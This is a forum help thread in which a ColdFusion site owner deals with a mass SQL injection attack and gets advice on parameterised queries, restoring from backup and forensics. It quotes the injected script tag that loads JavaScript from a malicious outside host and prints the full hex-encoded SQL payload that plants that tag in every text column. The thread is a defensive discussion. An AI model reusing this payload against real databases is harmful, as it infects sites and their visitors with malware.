cadkins
asked on
SQL Injection Attack - Need help please!
Hi,
We are experiencing a really bad SQL Injection attack on our webserver (we are using coldfusion). It has added the following code to many of our fields:
<script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>
Can someone guide me step to step on how to get rid of this code and also make sure it doesn't happen again in the future?
This is really urgent!
Thanks :)
We are experiencing a really bad SQL Injection attack on our webserver (we are using coldfusion). It has added the following code to many of our fields:
<script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>
Can someone guide me step to step on how to get rid of this code and also make sure it doesn't happen again in the future?
This is really urgent!
Thanks :)
DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C41524520 4054207661 7263686172 2832353529 2C40432076 6172636861 7228343030 3029204445 434C415245 205461626C 655F437572 736F722043 5552534F52 20464F5220 73656C6563 7420612E6E 616D652C62 2E6E616D65 2066726F6D 207379736F 626A656374 7320612C73 7973636F6C 756D6E7320 6220776865 726520612E 69643D622E 696420616E 6420612E78 747970653D 2775272061 6E64202862 2E78747970 653D393920 6F7220622E 7874797065 3D3335206F 7220622E78 747970653D 323331206F 7220622E78 747970653D 3136372920 4F50454E20 5461626C65 5F43757273 6F72204645 544348204E 4558542046 524F4D2020 5461626C65 5F43757273 6F7220494E 544F204054 2C40432057 48494C4528 4040464554 43485F5354 415455533D 3029204245 47494E2065 7865632827 7570646174 65205B272B 40542B275D 2073657420 5B272B4043 2B275D3D5B 272B40432B 275D2B2727 223E3C2F74 69746C653E 3C73637269 7074207372 633D226874 74703A2F2F 73646F2E31 3030306D67 2E636E2F63 737273732F 772E6A7322 3E3C2F7363 726970743E 3C212D2D27 2720776865 726520272B 40432B2720 6E6F74206C 696B652027 2725223E3C 2F7469746C 653E3C7363 7269707420 7372633D22 687474703A 2F2F73646F 2E31303030 6D672E636E 2F63737273 732F772E6A 73223E3C2F 7363726970 743E3C212D 2D27272729 4645544348 204E455854 2046524F4D 2020546162 6C655F4375 72736F7220 494E544F20 40542C4043 20454E4420 434C4F5345 205461626C 655F437572 736F722044 45414C4C4F 4341544520 5461626C65 5F43757273 6F72 AS varchar(4000) )
select @s
SET @S=CAST(0x4445434C41524520
select @s
ASKER
Can you be little bit more specific please? :)
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
xtype
99 - ntext
35 - text
231 - nvarchar
167 - varchar
99 - ntext
35 - text
231 - nvarchar
167 - varchar
ASKER
Well I understand that its selecting the table names and the column names from my database but how can i make this stop?
Thanks
Thanks
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
No I'm not using cfqueryparams...
Here are some examples of queries we are using
Here are some examples of queries we are using
<cfquery name="getEmpAppl" datasource="#Request.DataSource#">
select * from employmentApplication
where employmentApplicationID = #url.employmentApplicationID#
</cfquery>
<cfquery name="updateStatus" datasource= "#Request.DataSource#">
UPDATE employmentApplication SET
status = 'Viewed'
WHERE employmentApplicationID = #url.employmentApplicationID#
</cfquery>
<!---get the --->
<cfquery name="getQuestions" datasource="#Request.DataSource#">
select a.employmentApplicationID, a.empApplQuestionID, a.Answer, b.questionText
from empApplQuestion a, empApplicationQuestions b
where employmentApplicationID = #url.employmentApplicationID#
and a.empApplQuestionID = b.empApplQuestionID
</cfquery>
in every one of your queries add cfqueryparam
ie:
<cfqueryparam cfsqltype="cf_sql_varchar" value="#form.stringvalue#" >
you can add htmleditformat for added protection
<cfqueryparam cfsqltype="cf_sql_varchar" value="#htmleditformat(for m.stringva lue)#">
ie:
<cfqueryparam cfsqltype="cf_sql_varchar"
you can add htmleditformat for added protection
<cfqueryparam cfsqltype="cf_sql_varchar"
ASKER
So how would I re-write the 3 queries that I showed you on the example above to include cfqueryparam?
I'm confused on what exactly should I replace with what...
Thanks
I'm confused on what exactly should I replace with what...
Thanks
**CFQUERYPARAM is your best weapon against sql injections. **
You absolutely without any doubt add it to ALL your queries as soon as possible.
You will also gain a performance boost (slight one but over many requests it does make a difference).
You absolutely without any doubt add it to ALL your queries as soon as possible.
You will also gain a performance boost (slight one but over many requests it does make a difference).
instead of using dynamic sql . use sps, thats the best approach
ASKER
I think I wanna stick with sql but I'm still not sure how to use cfqueryparam...
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
"Is it me or are there many such reports today???"
last 2 days actually... there's lots of reports of this...and not just cfm sites
http://isc.sans.org/diary.html
last 2 days actually... there's lots of reports of this...and not just cfm sites
http://isc.sans.org/diary.html
ASKER
Cool that helps :)
So once I add cfqueryparam to all the queries, will that get rid of all the scripts that have been added to many of the fields of my database? (I'm talking about <script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>)
Thanks
So once I add cfqueryparam to all the queries, will that get rid of all the scripts that have been added to many of the fields of my database? (I'm talking about <script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>)
Thanks
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
I'm assuming that if I have clean backup of the database (before the attack) and I restore it that could work too right?
that would be the easiest for sure
i'd do a backup of the compormised db for forensics before you restore from the old
i'd do a backup of the compormised db for forensics before you restore from the old
ASKER
Ok I will try that and I will let you know sometime probably Monday if it worked
Thanks!
Thanks!
ASKER
I'm working on changing all the queries (there are 100s of them).
If I leave the old queries in my code as a comment (using <!--- and --->) would that be a problem? I just want to make sure that if I do something wrong I can always refer back to the old queries.
So basically I'm just wondering if code in a comment can be vulnerable to a SQL injection attack.
Thanks
If I leave the old queries in my code as a comment (using <!--- and --->) would that be a problem? I just want to make sure that if I do something wrong I can always refer back to the old queries.
So basically I'm just wondering if code in a comment can be vulnerable to a SQL injection attack.
Thanks
"if code in a comment can be vulnerable to a SQL injection attack."
no...it's a good idea actually... altho i'd go back once you've verified all is working as expected and remove them at some later date... makes the code easier to read later on
cf code comments are simply removed by the parser before any processing is done.
no...it's a good idea actually... altho i'd go back once you've verified all is working as expected and remove them at some later date... makes the code easier to read later on
cf code comments are simply removed by the parser before any processing is done.
ASKER
Thanks!
One more question. If a query has no "where" clause do I need to change anything?
For example:
<cfquery name="qryGetDataNew" datasource="#Request.DataS ource#">
select * from Incidents
order by recordNo
</cfquery>
One more question. If a query has no "where" clause do I need to change anything?
For example:
<cfquery name="qryGetDataNew" datasource="#Request.DataS
select * from Incidents
order by recordNo
</cfquery>
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
("where 1 = <cfqueryparam cfsqltype="cf_sql_integer" value="1"/>."
didn't know that yama .. thx for the link)
didn't know that yama .. thx for the link)
SidFishes, Check out all the other performance articles on that site. There's a good deal of stuff there.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
for everyone's information
there's an additional vuln possible if you are using Order by
http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order-by#more
there's an additional vuln possible if you are using Order by
http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order-by#more
ASKER
I finally modified all of the queries and now I'm testing to see if everything went well.
Most of them so far are OK but in addition to our SQL database we are also using an Access database for a small part of our website. I get an error on the page that we use the Access database.
Does cfqueryparam work for Access?
Most of them so far are OK but in addition to our SQL database we are also using an Access database for a small part of our website. I get an error on the page that we use the Access database.
Does cfqueryparam work for Access?
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
2008-08-08 00:13:06 192.168.80.10 GET /ah/ah_locations.cfm locationID=6';DECLARE%20@S
I deleted the ah_locations.cfm page yesterday just to see if that will help but it still finds it somehow...
HELP!